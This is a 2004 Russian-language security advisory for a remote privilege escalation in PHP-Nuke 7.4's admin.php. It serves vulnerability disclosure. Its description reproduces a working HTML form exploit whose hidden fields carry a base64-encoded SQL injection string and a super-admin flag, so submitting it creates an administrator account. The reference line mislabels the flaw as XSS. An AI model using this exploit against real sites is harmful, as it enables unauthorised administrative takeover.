Дата публикации: | 06.09.2004 |
Всего просмотров: | 2415 |
Опасность: | Высокая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: PHP-Nuke 7.4
Описание: Уязвимость обнаружена в PHP-Nuke в 'admin.php' сценарии. Удаленный пользователь может создать учетную запись с административными привилегиями. Удаленный пользователь может представить специально обработанный POST запрос к 'admin.php', чтобы добавить учетную запись пользователя с административными привилегиями: <form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php"> <p>USERNAME: <input type="text" name="add_aid"> <br> NOME: <input type="text" name="add_name"> <br> PASSWORD: <input type="text" name="add_pwd"> <br> E-MAIL: <input type="text" name="add_email"> <br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br> <input type="hidden" name="add_radminsuper" value="1"> <br> <input type="hidden" name="op" value="AddAuthor"> </p> <p> <input type="submit" name="Submit" value="Create Admin"> <br> </p> </form> URL производителя:http://www.phpnuke.org/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | [XSS] PHP-Nuke 7.4 Remote Privilege Escalation |